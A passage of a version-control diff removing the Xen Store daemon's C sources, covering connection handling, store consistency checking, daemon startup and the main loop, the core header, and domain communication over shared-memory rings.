client connection. */ -static void handle_input(struct connection *conn) -{ - int bytes; - struct buffered_data *in = conn->in; - - /* Not finished header yet? */ - if (in->inhdr) { - bytes = conn->read(conn, in->hdr.raw + in->used, - sizeof(in->hdr) - in->used); - if (bytes < 0) - goto bad_client; - in->used += bytes; - if (in->used != sizeof(in->hdr)) - return; - - if (in->hdr.msg.len > XENSTORE_PAYLOAD_MAX) { - syslog(LOG_ERR, "Client tried to feed us %i", - in->hdr.msg.len); - goto bad_client; - } - - in->buffer = talloc_array(in, char, in->hdr.msg.len); - if (!in->buffer) - goto bad_client; - in->used = 0; - in->inhdr = false; - return; - } - - bytes = conn->read(conn, in->buffer + in->used, - in->hdr.msg.len - in->used); - if (bytes < 0) - goto bad_client; - - in->used += bytes; - if (in->used != in->hdr.msg.len) - return; - - trace_io(conn, in, 0); - consider_message(conn); - return; - -bad_client: - /* Kill it. */ - talloc_free(conn); -} - -static void handle_output(struct connection *conn) -{ - if (!write_messages(conn)) - talloc_free(conn); -} - -struct connection *new_connection(connwritefn_t *write, connreadfn_t *read) -{ - struct connection *new; - - new = talloc_zero(talloc_autofree_context(), struct connection); - if (!new) - return NULL; - - new->fd = -1; - new->write = write; - new->read = read; - new->can_write = true; - new->transaction_started = 0; - INIT_LIST_HEAD(&new->out_list); - INIT_LIST_HEAD(&new->watches); - INIT_LIST_HEAD(&new->transaction_list); - - new->in = new_buffer(new); - if (new->in == NULL) { - talloc_free(new); - return NULL; - } - - list_add_tail(&new->list, &connections); - talloc_set_destructor(new, destroy_conn); - trace_create(new, "connection"); - return new; -} - -static int writefd(struct connection *conn, const void *data, unsigned int len) -{ - int rc; - - while ((rc = write(conn->fd, data, len)) < 0) { - if (errno == EAGAIN) { - rc = 0; - break; - } - if (errno != EINTR) - break; - } - - return rc; -} - -static int 
readfd(struct connection *conn, void *data, unsigned int len) -{ - int rc; - - while ((rc = read(conn->fd, data, len)) < 0) { - if (errno == EAGAIN) { - rc = 0; - break; - } - if (errno != EINTR) - break; - } - - /* Reading zero length means we're done with this connection. */ - if ((rc == 0) && (len != 0)) { - errno = EBADF; - rc = -1; - } - - return rc; -} - -static void accept_connection(int sock, bool canwrite) -{ - int fd; - struct connection *conn; - - fd = accept(sock, NULL, NULL); - if (fd < 0) - return; - - conn = new_connection(writefd, readfd); - if (conn) { - conn->fd = fd; - conn->can_write = canwrite; - } else - close(fd); -} - -#define TDB_FLAGS 0 - -/* We create initial nodes manually. */ -static void manual_node(const char *name, const char *child) -{ - struct node *node; - struct xs_permissions perms = { .id = 0, .perms = XS_PERM_NONE }; - - node = talloc_zero(NULL, struct node); - node->name = name; - node->perms = &perms; - node->num_perms = 1; - node->children = (char *)child; - if (child) - node->childlen = strlen(child) + 1; - - if (!write_node(NULL, node)) - barf_perror("Could not create initial node %s", name); - talloc_free(node); -} - -static void setup_structure(void) -{ - char *tdbname; - tdbname = talloc_strdup(talloc_autofree_context(), xs_daemon_tdb()); - tdb_ctx = tdb_open(tdbname, 0, TDB_FLAGS, O_RDWR, 0); - - if (tdb_ctx) { - /* XXX When we make xenstored able to restart, this will have - to become cleverer, checking for existing domains and not - removing the corresponding entries, but for now xenstored - cannot be restarted without losing all the registered - watches, which breaks all the backend drivers anyway. We - can therefore get away with just clearing /local and - expecting Xend to put the appropriate entries back in. 
- - When this change is made it is important to note that - dom0's entries must be cleaned up on reboot _before_ this - daemon starts, otherwise the backend drivers and dom0's - balloon driver will pick up stale entries. In the case of - the balloon driver, this can be fatal. - */ - char *tlocal = talloc_strdup(NULL, "/local"); - - check_store(); - - if (remove_local) { - internal_rm("/local"); - create_node(NULL, tlocal, NULL, 0); - - check_store(); - } - - talloc_free(tlocal); - } - else { - tdb_ctx = tdb_open(tdbname, 7919, TDB_FLAGS, O_RDWR|O_CREAT, - 0640); - if (!tdb_ctx) - barf_perror("Could not create tdb file %s", tdbname); - - manual_node("/", "tool"); - manual_node("/tool", "xenstored"); - manual_node("/tool/xenstored", NULL); - - check_store(); - } -} - - -static unsigned int hash_from_key_fn(void *k) -{ - char *str = k; - unsigned int hash = 5381; - char c; - - while ((c = *str++)) - hash = ((hash << 5) + hash) + (unsigned int)c; - - return hash; -} - - -static int keys_equal_fn(void *key1, void *key2) -{ - return 0 == strcmp((char *)key1, (char *)key2); -} - - -static char *child_name(const char *s1, const char *s2) -{ - if (strcmp(s1, "/")) { - return talloc_asprintf(NULL, "%s/%s", s1, s2); - } - else { - return talloc_asprintf(NULL, "/%s", s2); - } -} - - -static void remember_string(struct hashtable *hash, const char *str) -{ - char *k = malloc(strlen(str) + 1); - strcpy(k, str); - hashtable_insert(hash, k, (void *)1); -} - - -/** - * A node has a children field that names the children of the node, separated - * by NULs. We check whether there are entries in there that are duplicated - * (and if so, delete the second one), and whether there are any that do not - * have a corresponding child node (and if so, delete them). Each valid child - * is then recursively checked. - * - * No deleting is performed if the recovery flag is cleared (i.e. -R was - * passed on the command line). 
- * - * As we go, we record each node in the given reachable hashtable. These - * entries will be used later in clean_store. - */ -static void check_store_(const char *name, struct hashtable *reachable) -{ - struct node *node = read_node(NULL, name); - - if (node) { - size_t i = 0; - - struct hashtable * children = - create_hashtable(16, hash_from_key_fn, keys_equal_fn); - - remember_string(reachable, name); - - while (i < node->childlen) { - size_t childlen = strlen(node->children + i); - char * childname = child_name(node->name, - node->children + i); - struct node *childnode = read_node(NULL, childname); - - if (childnode) { - if (hashtable_search(children, childname)) { - log("check_store: '%s' is duplicated!", - childname); - - if (recovery) { - remove_child_entry(NULL, node, - i); - i -= childlen + 1; - } - } - else { - remember_string(children, childname); - check_store_(childname, reachable); - } - } - else { - log("check_store: No child '%s' found!\n", - childname); - - if (recovery) { - remove_child_entry(NULL, node, i); - i -= childlen + 1; - } - } - - talloc_free(childnode); - talloc_free(childname); - i += childlen + 1; - } - - hashtable_destroy(children, 0 /* Don't free values (they are - all (void *)1) */); - talloc_free(node); - } - else { - /* Impossible, because no database should ever be without the - root, and otherwise, we've just checked in our caller - (which made a recursive call to get here). */ - - log("check_store: No child '%s' found: impossible!", name); - } -} - - -/** - * Helper to clean_store below. 
- */ -static int clean_store_(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA val, - void *private) -{ - struct hashtable *reachable = private; - char * name = talloc_strndup(NULL, key.dptr, key.dsize); - - if (!hashtable_search(reachable, name)) { - log("clean_store: '%s' is orphaned!", name); - if (recovery) { - tdb_delete(tdb, key); - } - } - - talloc_free(name); - - return 0; -} - - -/** - * Given the list of reachable nodes, iterate over the whole store, and - * remove any that were not reached. - */ -static void clean_store(struct hashtable *reachable) -{ - tdb_traverse(tdb_ctx, &clean_store_, reachable); -} - - -static void check_store(void) -{ - char * root = talloc_strdup(NULL, "/"); - struct hashtable * reachable = - create_hashtable(16, hash_from_key_fn, keys_equal_fn); - - log("Checking store ..."); - check_store_(root, reachable); - clean_store(reachable); - log("Checking store complete."); - - hashtable_destroy(reachable, 0 /* Don't free values (they are all - (void *)1) */); - talloc_free(root); -} - - -/* Something is horribly wrong: check the store. */ -static void corrupt(struct connection *conn, const char *fmt, ...) -{ - va_list arglist; - char *str; - int saved_errno = errno; - - va_start(arglist, fmt); - str = talloc_vasprintf(NULL, fmt, arglist); - va_end(arglist); - - log("corruption detected by connection %i: err %s: %s", - conn ? (int)conn->id : -1, strerror(saved_errno), str); - - check_store(); -} - - -static void write_pidfile(const char *pidfile) -{ - char buf[100]; - int len; - int fd; - - fd = open(pidfile, O_RDWR | O_CREAT, 0600); - if (fd == -1) - barf_perror("Opening pid file %s", pidfile); - - /* We exit silently if daemon already running. */ - if (lockf(fd, F_TLOCK, 0) == -1) - exit(0); - - len = snprintf(buf, sizeof(buf), "%ld\n", (long)getpid()); - if (write(fd, buf, len) != len) - barf_perror("Writing pid file %s", pidfile); -} - -/* Stevens. 
*/ -static void daemonize(void) -{ - pid_t pid; - - /* Separate from our parent via fork, so init inherits us. */ - if ((pid = fork()) < 0) - barf_perror("Failed to fork daemon"); - if (pid != 0) - exit(0); - - /* Session leader so ^C doesn't whack us. */ - setsid(); - - /* Let session leader exit so child cannot regain CTTY */ - if ((pid = fork()) < 0) - barf_perror("Failed to fork daemon"); - if (pid != 0) - exit(0); - - /* Move off any mount points we might be in. */ - if (chdir("/") == -1) - barf_perror("Failed to chdir"); - - /* Discard our parent's old-fashioned umask prejudices. */ - umask(0); -} - - -static void usage(void) -{ - fprintf(stderr, -"Usage:\n" -"\n" -" xenstored \n" -"\n" -"where options may include:\n" -"\n" -" --no-domain-init to state that xenstored should not initialise dom0,\n" -" --pid-file giving a file for the daemon's pid to be written,\n" -" --help to output this message,\n" -" --no-fork to request that the daemon does not fork,\n" -" --output-pid to request that the pid of the daemon is output,\n" -" --trace-file giving the file for logging, and\n" -" --entry-nb limit the number of entries per domain,\n" -" --entry-size limit the size of entry per domain, and\n" -" --entry-watch limit the number of watches per domain,\n" -" --transaction limit the number of transaction allowed per domain,\n" -" --no-recovery to request that no recovery should be attempted when\n" -" the store is corrupted (debug only),\n" -" --preserve-local to request that /local is preserved on start-up,\n" -" --verbose to request verbose execution.\n"); -} - - -static struct option options[] = { - { "no-domain-init", 0, NULL, 'D' }, - { "entry-nb", 1, NULL, 'E' }, - { "pid-file", 1, NULL, 'F' }, - { "help", 0, NULL, 'H' }, - { "no-fork", 0, NULL, 'N' }, - { "output-pid", 0, NULL, 'P' }, - { "entry-size", 1, NULL, 'S' }, - { "trace-file", 1, NULL, 'T' }, - { "transaction", 1, NULL, 't' }, - { "no-recovery", 0, NULL, 'R' }, - { "preserve-local", 0, NULL, 'L' }, - { 
"verbose", 0, NULL, 'V' }, - { "watch-nb", 1, NULL, 'W' }, - { NULL, 0, NULL, 0 } }; - -extern void dump_conn(struct connection *conn); - -int main(int argc, char *argv[]) -{ - int opt, *sock, *ro_sock, max; - struct sockaddr_un addr; - fd_set inset, outset; - bool dofork = true; - bool outputpid = false; - bool no_domain_init = false; - const char *pidfile = NULL; - int evtchn_fd = -1; - struct timeval *timeout; - - while ((opt = getopt_long(argc, argv, "DE:F:HNPS:t:T:RLVW:", options, - NULL)) != -1) { - switch (opt) { - case 'D': - no_domain_init = true; - break; - case 'E': - quota_nb_entry_per_domain = strtol(optarg, NULL, 10); - break; - case 'F': - pidfile = optarg; - break; - case 'H': - usage(); - return 0; - case 'N': - dofork = false; - break; - case 'P': - outputpid = true; - break; - case 'R': - recovery = false; - break; - case 'L': - remove_local = false; - break; - case 'S': - quota_max_entry_size = strtol(optarg, NULL, 10); - break; - case 't': - quota_max_transaction = strtol(optarg, NULL, 10); - break; - case 'T': - tracefile = optarg; - break; - case 'V': - verbose = true; - break; - case 'W': - quota_nb_watch_per_domain = strtol(optarg, NULL, 10); - break; - } - } - if (optind != argc) - barf("%s: No arguments desired", argv[0]); - - reopen_log(); - - /* make sure xenstored directory exists */ - if (mkdir(xs_daemon_rundir(), 0755)) { - if (errno != EEXIST) { - perror("error: mkdir daemon rundir"); - exit(-1); - } - } - - if (mkdir(xs_daemon_rootdir(), 0755)) { - if (errno != EEXIST) { - perror("error: mkdir daemon rootdir"); - exit(-1); - } - } - - if (dofork) { - openlog("xenstored", 0, LOG_DAEMON); - daemonize(); - } - if (pidfile) - write_pidfile(pidfile); - - /* Talloc leak reports go to stderr, which is closed if we fork. */ - if (!dofork) - talloc_enable_leak_report_full(); - - /* Create sockets for them to listen to. 
*/ - sock = talloc(talloc_autofree_context(), int); - *sock = socket(PF_UNIX, SOCK_STREAM, 0); - if (*sock < 0) - barf_perror("Could not create socket"); - ro_sock = talloc(talloc_autofree_context(), int); - *ro_sock = socket(PF_UNIX, SOCK_STREAM, 0); - if (*ro_sock < 0) - barf_perror("Could not create socket"); - talloc_set_destructor(sock, destroy_fd); - talloc_set_destructor(ro_sock, destroy_fd); - - /* Don't kill us with SIGPIPE. */ - signal(SIGPIPE, SIG_IGN); - - /* FIXME: Be more sophisticated, don't mug running daemon. */ - unlink(xs_daemon_socket()); - unlink(xs_daemon_socket_ro()); - - addr.sun_family = AF_UNIX; - strcpy(addr.sun_path, xs_daemon_socket()); - if (bind(*sock, (struct sockaddr *)&addr, sizeof(addr)) != 0) - barf_perror("Could not bind socket to %s", xs_daemon_socket()); - strcpy(addr.sun_path, xs_daemon_socket_ro()); - if (bind(*ro_sock, (struct sockaddr *)&addr, sizeof(addr)) != 0) - barf_perror("Could not bind socket to %s", - xs_daemon_socket_ro()); - if (chmod(xs_daemon_socket(), 0600) != 0 - || chmod(xs_daemon_socket_ro(), 0660) != 0) - barf_perror("Could not chmod sockets"); - - if (listen(*sock, 1) != 0 - || listen(*ro_sock, 1) != 0) - barf_perror("Could not listen on sockets"); - - if (pipe(reopen_log_pipe)) { - barf_perror("pipe"); - } - - /* Setup the database */ - setup_structure(); - - /* Listen to hypervisor. */ - if (!no_domain_init) - domain_init(); - - /* Restore existing connections. 
*/ - restore_existing_connections(); - - if (outputpid) { - printf("%ld\n", (long)getpid()); - fflush(stdout); - } - - /* redirect to /dev/null now we're ready to accept connections */ - if (dofork) { - int devnull = open("/dev/null", O_RDWR); - if (devnull == -1) - barf_perror("Could not open /dev/null\n"); - dup2(devnull, STDIN_FILENO); - dup2(devnull, STDOUT_FILENO); - dup2(devnull, STDERR_FILENO); - close(devnull); - xprintf = trace; - } - - signal(SIGHUP, trigger_reopen_log); - - if (xce_handle != -1) - evtchn_fd = xc_evtchn_fd(xce_handle); - - /* Get ready to listen to the tools. */ - max = initialize_set(&inset, &outset, *sock, *ro_sock, &timeout); - - /* Tell the kernel we're up and running. */ - xenbus_notify_running(); - - /* Main loop. */ - for (;;) { - struct connection *conn, *next; - - if (select(max+1, &inset, &outset, NULL, timeout) < 0) { - if (errno == EINTR) - continue; - barf_perror("Select failed"); - } - - if (FD_ISSET(reopen_log_pipe[0], &inset)) { - char c; - if (read(reopen_log_pipe[0], &c, 1) != 1) - barf_perror("read failed"); - reopen_log(); - } - - if (FD_ISSET(*sock, &inset)) - accept_connection(*sock, true); - - if (FD_ISSET(*ro_sock, &inset)) - accept_connection(*ro_sock, false); - - if (evtchn_fd != -1 && FD_ISSET(evtchn_fd, &inset)) - handle_event(); - - next = list_entry(connections.next, typeof(*conn), list); - while (&next->list != &connections) { - conn = next; - - next = list_entry(conn->list.next, - typeof(*conn), list); - - if (conn->domain) { - talloc_increase_ref_count(conn); - if (domain_can_read(conn)) - handle_input(conn); - if (talloc_free(conn) == 0) - continue; - - talloc_increase_ref_count(conn); - if (domain_can_write(conn) && - !list_empty(&conn->out_list)) - handle_output(conn); - if (talloc_free(conn) == 0) - continue; - } else { - talloc_increase_ref_count(conn); - if (FD_ISSET(conn->fd, &inset)) - handle_input(conn); - if (talloc_free(conn) == 0) - continue; - - talloc_increase_ref_count(conn); - if 
(FD_ISSET(conn->fd, &outset)) - handle_output(conn); - if (talloc_free(conn) == 0) - continue; - } - } - - max = initialize_set(&inset, &outset, *sock, *ro_sock, - &timeout); - } -} - -/* - * Local variables: - * c-file-style: "linux" - * indent-tabs-mode: t - * c-indent-level: 8 - * c-basic-offset: 8 - * tab-width: 8 - * End: - */ diff -r 10a8fae412c5 tools/xenstore/xenstored_core.h --- a/tools/xenstore/xenstored_core.h Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,191 +0,0 @@ -/* - Internal interfaces for Xen Store Daemon. - Copyright (C) 2005 Rusty Russell IBM Corporation - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -#ifndef _XENSTORED_CORE_H -#define _XENSTORED_CORE_H - -#include - -#include -#include -#include -#include -#include -#include "xs_lib.h" -#include "list.h" -#include "tdb.h" - -struct buffered_data -{ - struct list_head list; - - /* Are we still doing the header? */ - bool inhdr; - - /* How far are we? */ - unsigned int used; - - union { - struct xsd_sockmsg msg; - char raw[sizeof(struct xsd_sockmsg)]; - } hdr; - - /* The actual data. 
*/ - char *buffer; -}; - -struct connection; -typedef int connwritefn_t(struct connection *, const void *, unsigned int); -typedef int connreadfn_t(struct connection *, void *, unsigned int); - -struct connection -{ - struct list_head list; - - /* The file descriptor we came in on. */ - int fd; - - /* Who am I? 0 for socket connections. */ - unsigned int id; - - /* Is this a read-only connection? */ - bool can_write; - - /* Buffered incoming data. */ - struct buffered_data *in; - - /* Buffered output data */ - struct list_head out_list; - - /* Transaction context for current request (NULL if none). */ - struct transaction *transaction; - - /* List of in-progress transactions. */ - struct list_head transaction_list; - uint32_t next_transaction_id; - unsigned int transaction_started; - - /* The domain I'm associated with, if any. */ - struct domain *domain; - - /* The target of the domain I'm associated with. */ - struct connection *target; - - /* My watches. */ - struct list_head watches; - - /* Methods for communicating over this connection: write can be NULL */ - connwritefn_t *write; - connreadfn_t *read; -}; -extern struct list_head connections; - -struct node { - const char *name; - - /* Database I came from */ - TDB_CONTEXT *tdb; - - /* Parent (optional) */ - struct node *parent; - - /* Permissions. */ - unsigned int num_perms; - struct xs_permissions *perms; - - /* Contents. */ - unsigned int datalen; - void *data; - - /* Children, each nul-terminated. */ - unsigned int childlen; - char *children; -}; - -/* Break input into vectors, return the number, fill in up to num of them. */ -unsigned int get_strings(struct buffered_data *data, - char *vec[], unsigned int num); - -/* Is child node a child or equal to parent node? 
*/ -bool is_child(const char *child, const char *parent); - -void send_reply(struct connection *conn, enum xsd_sockmsg_type type, - const void *data, unsigned int len); - -/* Some routines (write, mkdir, etc) just need a non-error return */ -void send_ack(struct connection *conn, enum xsd_sockmsg_type type); - -/* Send an error: error is usually "errno". */ -void send_error(struct connection *conn, int error); - -/* Canonicalize this path if possible. */ -char *canonicalize(struct connection *conn, const char *node); - -/* Check if node is an event node. */ -bool check_event_node(const char *node); - -/* Get this node, checking we have permissions. */ -struct node *get_node(struct connection *conn, - const char *name, - enum xs_perm_type perm); - -/* Get TDB context for this connection */ -TDB_CONTEXT *tdb_context(struct connection *conn); - -/* Destructor for tdbs: required for transaction code */ -int destroy_tdb(void *_tdb); - -/* Replace the tdb: required for transaction code */ -bool replace_tdb(const char *newname, TDB_CONTEXT *newtdb); - -struct connection *new_connection(connwritefn_t *write, connreadfn_t *read); - - -/* Is this a valid node name? */ -bool is_valid_nodename(const char *node); - -/* Tracing infrastructure. */ -void trace_create(const void *data, const char *type); -void trace_destroy(const void *data, const char *type); -void trace_watch_timeout(const struct connection *conn, const char *node, const char *token); -void trace(const char *fmt, ...); -void dtrace_io(const struct connection *conn, const struct buffered_data *data, int out); - -extern int event_fd; - -/* Map the kernel's xenstore page. */ -void *xenbus_map(void); - -/* Return the event channel used by xenbus. */ -evtchn_port_t xenbus_evtchn(void); - -/* Tell the kernel xenstored is running. 
*/ -void xenbus_notify_running(void); - -#endif /* _XENSTORED_CORE_H */ - -/* - * Local variables: - * c-file-style: "linux" - * indent-tabs-mode: t - * c-indent-level: 8 - * c-basic-offset: 8 - * tab-width: 8 - * End: - */ diff -r 10a8fae412c5 tools/xenstore/xenstored_domain.c --- a/tools/xenstore/xenstored_domain.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,710 +0,0 @@ -/* - Domain communications for Xen Store Daemon. - Copyright (C) 2005 Rusty Russell IBM Corporation - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -#include -#include -#include -#include -#include - -#include "utils.h" -#include "talloc.h" -#include "xenstored_core.h" -#include "xenstored_domain.h" -#include "xenstored_transaction.h" -#include "xenstored_watch.h" - -#include - -static int *xc_handle; -static evtchn_port_t virq_port; - -int xce_handle = -1; - -struct domain -{ - struct list_head list; - - /* The id of this domain */ - unsigned int domid; - - /* Event channel port */ - evtchn_port_t port; - - /* The remote end of the event channel, used only to validate - repeated domain introductions. */ - evtchn_port_t remote_port; - - /* The mfn associated with the event channel, used only to validate - repeated domain introductions. */ - unsigned long mfn; - - /* Domain path in store. 
*/ - char *path; - - /* Shared page. */ - struct xenstore_domain_interface *interface; - - /* The connection associated with this. */ - struct connection *conn; - - /* Have we noticed that this domain is shutdown? */ - int shutdown; - - /* number of entry from this domain in the store */ - int nbentry; - - /* number of watch for this domain */ - int nbwatch; -}; - -static LIST_HEAD(domains); - -static bool check_indexes(XENSTORE_RING_IDX cons, XENSTORE_RING_IDX prod) -{ - return ((prod - cons) <= XENSTORE_RING_SIZE); -} - -static void *get_output_chunk(XENSTORE_RING_IDX cons, - XENSTORE_RING_IDX prod, - char *buf, uint32_t *len) -{ - *len = XENSTORE_RING_SIZE - MASK_XENSTORE_IDX(prod); - if ((XENSTORE_RING_SIZE - (prod - cons)) < *len) - *len = XENSTORE_RING_SIZE - (prod - cons); - return buf + MASK_XENSTORE_IDX(prod); -} - -static const void *get_input_chunk(XENSTORE_RING_IDX cons, - XENSTORE_RING_IDX prod, - const char *buf, uint32_t *len) -{ - *len = XENSTORE_RING_SIZE - MASK_XENSTORE_IDX(cons); - if ((prod - cons) < *len) - *len = prod - cons; - return buf + MASK_XENSTORE_IDX(cons); -} - -static int writechn(struct connection *conn, - const void *data, unsigned int len) -{ - uint32_t avail; - void *dest; - struct xenstore_domain_interface *intf = conn->domain->interface; - XENSTORE_RING_IDX cons, prod; - - /* Must read indexes once, and before anything else, and verified. 
*/ - cons = intf->rsp_cons; - prod = intf->rsp_prod; - xen_mb(); - - if (!check_indexes(cons, prod)) { - errno = EIO; - return -1; - } - - dest = get_output_chunk(cons, prod, intf->rsp, &avail); - if (avail < len) - len = avail; - - memcpy(dest, data, len); - xen_mb(); - intf->rsp_prod += len; - - xc_evtchn_notify(xce_handle, conn->domain->port); - - return len; -} - -static int readchn(struct connection *conn, void *data, unsigned int len) -{ - uint32_t avail; - const void *src; - struct xenstore_domain_interface *intf = conn->domain->interface; - XENSTORE_RING_IDX cons, prod; - - /* Must read indexes once, and before anything else, and verified. */ - cons = intf->req_cons; - prod = intf->req_prod; - xen_mb(); - - if (!check_indexes(cons, prod)) { - errno = EIO; - return -1; - } - - src = get_input_chunk(cons, prod, intf->req, &avail); - if (avail < len) - len = avail; - - memcpy(data, src, len); - xen_mb(); - intf->req_cons += len; - - xc_evtchn_notify(xce_handle, conn->domain->port); - - return len; -} - -static int destroy_domain(void *_domain) -{ - struct domain *domain = _domain; - - list_del(&domain->list); - - if (domain->port) { - if (xc_evtchn_unbind(xce_handle, domain->port) == -1) - eprintf("> Unbinding port %i failed!\n", domain->port); - } - - if (domain->interface) - munmap(domain->interface, getpagesize()); - - fire_watches(NULL, "@releaseDomain", false); - - return 0; -} - -static void domain_cleanup(void) -{ - xc_dominfo_t dominfo; - struct domain *domain, *tmp; - int notify = 0; - - list_for_each_entry_safe(domain, tmp, &domains, list) { - if (xc_domain_getinfo(*xc_handle, domain->domid, 1, - &dominfo) == 1 && - dominfo.domid == domain->domid) { - if ((dominfo.crashed || dominfo.shutdown) - && !domain->shutdown) { - domain->shutdown = 1; - notify = 1; - } - if (!dominfo.dying) - continue; - } - talloc_free(domain->conn); - notify = 0; /* destroy_domain() fires the watch */ - } - - if (notify) - fire_watches(NULL, "@releaseDomain", false); -} - 
-/* We scan all domains rather than use the information given here. */ -void handle_event(void) -{ - evtchn_port_t port; - - if ((port = xc_evtchn_pending(xce_handle)) == -1) - barf_perror("Failed to read from event fd"); - - if (port == virq_port) - domain_cleanup(); - - if (xc_evtchn_unmask(xce_handle, port) == -1) - barf_perror("Failed to write to event fd"); -} - -bool domain_can_read(struct connection *conn) -{ - struct xenstore_domain_interface *intf = conn->domain->interface; - return (intf->req_cons != intf->req_prod); -} - -bool domain_is_unprivileged(struct connection *conn) -{ - return (conn && conn->domain && conn->domain->domid != 0); -} - -bool domain_can_write(struct connection *conn) -{ - struct xenstore_domain_interface *intf = conn->domain->interface; - return ((intf->rsp_prod - intf->rsp_cons) != XENSTORE_RING_SIZE); -} - -static char *talloc_domain_path(void *context, unsigned int domid) -{ - return talloc_asprintf(context, "/local/domain/%u", domid); -} - -static struct domain *new_domain(void *context, unsigned int domid, - int port) -{ - struct domain *domain; - int rc; - - domain = talloc(context, struct domain); - domain->port = 0; - domain->shutdown = 0; - domain->domid = domid; - domain->path = talloc_domain_path(domain, domid); - - list_add(&domain->list, &domains); - talloc_set_destructor(domain, destroy_domain); - - /* Tell kernel we're interested in this event. 
*/ - rc = xc_evtchn_bind_interdomain(xce_handle, domid, port); - if (rc == -1) - return NULL; - domain->port = rc; - - domain->conn = new_connection(writechn, readchn); - domain->conn->domain = domain; - domain->conn->id = domid; - - domain->remote_port = port; - domain->nbentry = 0; - domain->nbwatch = 0; - - return domain; -} - - -static struct domain *find_domain_by_domid(unsigned int domid) -{ - struct domain *i; - - list_for_each_entry(i, &domains, list) { - if (i->domid == domid) - return i; - } - return NULL; -} - -static void domain_conn_reset(struct domain *domain) -{ - struct connection *conn = domain->conn; - struct buffered_data *out; - - conn_delete_all_watches(conn); - conn_delete_all_transactions(conn); - - while ((out = list_top(&conn->out_list, struct buffered_data, list))) { - list_del(&out->list); - talloc_free(out); - } - - talloc_free(conn->in->buffer); - memset(conn->in, 0, sizeof(*conn->in)); - conn->in->inhdr = true; - - domain->interface->req_cons = domain->interface->req_prod = 0; - domain->interface->rsp_cons = domain->interface->rsp_prod = 0; -} - -/* domid, mfn, evtchn, path */ -void do_introduce(struct connection *conn, struct buffered_data *in) -{ - struct domain *domain; - char *vec[3]; - unsigned int domid; - unsigned long mfn; - evtchn_port_t port; - int rc; - struct xenstore_domain_interface *interface; - - if (get_strings(in, vec, ARRAY_SIZE(vec)) < ARRAY_SIZE(vec)) { - send_error(conn, EINVAL); - return; - } - - if (conn->id != 0 || !conn->can_write) { - send_error(conn, EACCES); - return; - } - - domid = atoi(vec[0]); - mfn = atol(vec[1]); - port = atoi(vec[2]); - - /* Sanity check args. */ - if (port <= 0) { - send_error(conn, EINVAL); - return; - } - - domain = find_domain_by_domid(domid); - - if (domain == NULL) { - interface = xc_map_foreign_range( - *xc_handle, domid, - getpagesize(), PROT_READ|PROT_WRITE, mfn); - if (!interface) { - send_error(conn, errno); - return; - } - /* Hang domain off "in" until we're finished. 
*/ - domain = new_domain(in, domid, port); - if (!domain) { - munmap(interface, getpagesize()); - send_error(conn, errno); - return; - } - domain->interface = interface; - domain->mfn = mfn; - - /* Now domain belongs to its connection. */ - talloc_steal(domain->conn, domain); - - fire_watches(NULL, "@introduceDomain", false); - } else if ((domain->mfn == mfn) && (domain->conn != conn)) { - /* Use XS_INTRODUCE for recreating the xenbus event-channel. */ - if (domain->port) - xc_evtchn_unbind(xce_handle, domain->port); - rc = xc_evtchn_bind_interdomain(xce_handle, domid, port); - domain->port = (rc == -1) ? 0 : rc; - domain->remote_port = port; - } else { - send_error(conn, EINVAL); - return; - } - - domain_conn_reset(domain); - - send_ack(conn, XS_INTRODUCE); -} - -void do_set_target(struct connection *conn, struct buffered_data *in) -{ - char *vec[2]; - unsigned int domid, tdomid; - struct domain *domain, *tdomain; - if (get_strings(in, vec, ARRAY_SIZE(vec)) < ARRAY_SIZE(vec)) { - send_error(conn, EINVAL); - return; - } - - if (conn->id != 0 || !conn->can_write) { - send_error(conn, EACCES); - return; - } - - domid = atoi(vec[0]); - tdomid = atoi(vec[1]); - - domain = find_domain_by_domid(domid); - if (!domain) { - send_error(conn, ENOENT); - return; - } - if (!domain->conn) { - send_error(conn, EINVAL); - return; - } - - tdomain = find_domain_by_domid(tdomid); - if (!tdomain) { - send_error(conn, ENOENT); - return; - } - - if (!tdomain->conn) { - send_error(conn, EINVAL); - return; - } - - talloc_reference(domain->conn, tdomain->conn); - domain->conn->target = tdomain->conn; - - send_ack(conn, XS_SET_TARGET); -} - -/* domid */ -void do_release(struct connection *conn, const char *domid_str) -{ - struct domain *domain; - unsigned int domid; - - if (!domid_str) { - send_error(conn, EINVAL); - return; - } - - domid = atoi(domid_str); - if (!domid) { - send_error(conn, EINVAL); - return; - } - - if (conn->id != 0) { - send_error(conn, EACCES); - return; - } - - domain 
= find_domain_by_domid(domid); - if (!domain) { - send_error(conn, ENOENT); - return; - } - - if (!domain->conn) { - send_error(conn, EINVAL); - return; - } - - talloc_free(domain->conn); - - send_ack(conn, XS_RELEASE); -} - -void do_resume(struct connection *conn, const char *domid_str) -{ - struct domain *domain; - unsigned int domid; - - if (!domid_str) { - send_error(conn, EINVAL); - return; - } - - domid = atoi(domid_str); - if (!domid) { - send_error(conn, EINVAL); - return; - } - - if (conn->id != 0) { - send_error(conn, EACCES); - return; - } - - domain = find_domain_by_domid(domid); - if (!domain) { - send_error(conn, ENOENT); - return; - } - - if (!domain->conn) { - send_error(conn, EINVAL); - return; - } - - domain->shutdown = 0; - - send_ack(conn, XS_RESUME); -} - -void do_get_domain_path(struct connection *conn, const char *domid_str) -{ - char *path; - - if (!domid_str) { - send_error(conn, EINVAL); - return; - } - - path = talloc_domain_path(conn, atoi(domid_str)); - - send_reply(conn, XS_GET_DOMAIN_PATH, path, strlen(path) + 1); - - 